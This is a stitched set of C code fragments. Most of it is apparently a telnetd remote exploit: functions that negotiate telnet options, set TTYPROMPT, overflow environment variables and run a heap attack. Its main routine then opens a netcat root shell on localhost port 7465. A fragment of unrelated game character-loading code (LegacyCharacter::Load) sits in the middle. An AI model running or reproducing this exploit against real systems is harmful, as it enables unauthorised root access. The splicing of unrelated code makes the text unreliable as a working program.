void negotiate(int sd) { wont(sd,TELOPT_TTYPE); wont(sd,TELOPT_NAWS); wont(sd,TELOPT_XDISPLOC); will(sd,TELOPT_LFLOW); will(sd,TELOPT_LINEMODE); wont(sd,TELOPT_OLD_ENVIRON); will(sd,TELOPT_NEW_ENVIRON); will(sd,TELOPT_BINARY); env(sd,"TTYPROMPT","abcdef"); }
void LegacyCharacter::Load( moPropBagRef propBag ) { moPropStringRef name ( g_name ); // name of character moPropIntRef monster ( g_monster ); // is this character a monster or pc? (bool value) moPropIntRef status ( g_status ); // normal, delayed or readied action (Character::Status) moPropIntRef maxHP ( g_maxHP ); // Maximum hitpoints the character has moPropIntRef damage ( g_damage ); // Current damage moPropIntRef stabilized ( g_stabilized ); // Applies to dying character moPropIntRef justdropped ( g_justdropped ); // True if character just dropped this round moPropIntRef init ( g_init ); // init modifier moPropIntRef spot ( g_spot ); // spot modifier moPropIntRef listen ( g_listen ); // listen modifier moPropIntRef will ( g_will ); // will modifier moPropIntRef position ( g_position ); // the initiative position moPropIntRef initRoll ( g_initRoll ); // the actual rolls moPropIntRef spotRoll ( g_spotRoll ); moPropIntRef listenRoll ( g_listenRoll ); moPropIntRef willRoll ( g_willRoll ); name .Link( propBag ); monster .Link( propBag ); status .Link( propBag ); maxHP .Link( propBag ); damage .Link( propBag ); stabilized .Link( propBag ); justdropped .Link( propBag ); init .Link( propBag ); spot .Link( propBag ); listen .Link( propBag ); will .Link( propBag ); position .Link( propBag ); initRoll .Link( propBag ); spotRoll .Link( propBag ); listenRoll .Link( propBag ); willRoll .Link( propBag ); if( name.HasProp() ) f_name = static_cast<moWCString>(name).c_str(); if( status.HasProp() ) f_status = static_cast<InternalStatus>( static_cast<int>(status) ); if( monster.HasProp() ) f_monster = monster? true: false; if( maxHP.HasProp() ) f_maxHP = maxHP; if( damage.HasProp() ) f_damage = damage; if( stabilized.HasProp() ) f_stabilized = stabilized? true: false; if( justdropped.HasProp() ) f_justdropped = justdropped? true: false; if( init.HasProp() ) f_init = init; if( spot.HasProp() ) f_spot = spot; if( listen.HasProp() ) f_listen = listen; if( will.HasProp() ) f_will = will; if( position.HasProp() ) f_position = position; if( initRoll.HasProp() ) f_initRoll = initRoll; if( spotRoll.HasProp() ) f_spotRoll = spotRoll; if( listenRoll.HasProp() ) f_listenRoll = listenRoll; if( willRoll.HasProp() ) f_willRoll = willRoll; }
fill2 (int count, char with, int real) { int l; int first, rest, find; first = (int) (count / dalen) - 10; rest = (int) (((count) % dalen) / 3) * 3; find = count - ((first * dalen) + (rest * 3)); solve (find); first += big; rest += small; for (l = 0; l < first; l++) do_ayt (); for (l = 0; l < rest; l++) will (with); if (real == 1) { push_clean (); } }
main (int argc, char *argv[]) { int br, l, dosleep = 0; int percent = 0; char spin; unsigned char w; bzero (oldenv, sizeof (oldenv)); argv++; dalen = strlen ("clarity.local"); while (argv[0]) { if (!strcmp (argv[0], "--pause")) dosleep = 1; if (!strcmp (argv[0], "--size") && argv[1]) { mipl = atoi (argv[1]); argv++; } if (!strcmp (argv[0], "--name") && argv[1]) { dalen = strlen (argv[1]); argv++; } argv++; } fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen); if(dalen%3==0) { offsets=offset3; } else { ninbufoffset = mipl % 8192; offsets[11] += 32 * (mipl - ninbufoffset) / 8192; if (offsets[11] > 255) { fprintf (stderr, " ! MiPl too big.", mipl, dalen); exit (1); } } sock_setup (); if (dosleep) { system ("sleep 1;ps aux|grep in.telnetd|grep -v grep"); sleep (8); } dalen += strlen ("\r\n[ : yes]\r\n"); fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n"); fflush (stderr); doo (5); will (39); fflush (dasock); read_sock (); fprintf (stderr, "o Setting up environment vars...\n"); fflush (stderr); will (1); push_clean (); doenv ("USER", "zen-parse"); doenv ("TERM", "zen-parse"); will (39); fflush (dasock); fprintf (stderr, "o Doing overflows...\n"); fflush (stderr); for (br = 0; (offsets[br] || offsets[br + 1]); br += 2) { fill (mipl + ENV + offsets[br], offsets[br + 1]); fflush (dasock); usleep (100000); read_sock (); } fprintf (stderr, "o Overflows done...\n"); fflush (stderr); push_clean (); fprintf (stderr, "o Sending IACs to start login process...\n"); fflush (stderr); wont (24); wont (32); wont (35); fprintf (dasock, "%s", tosend); will (1); push_heap_attack (); sleep (1); fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n"); execlp ("nc", "nc", "-v", "localhost", "7465", 0); fprintf (stderr, "o If the exploit worked, there should be an open port on 7465.\n"); fprintf (stderr, " It is a root shell. You should probably close it.\n"); fflush (stderr); sleep (60); exit (0); }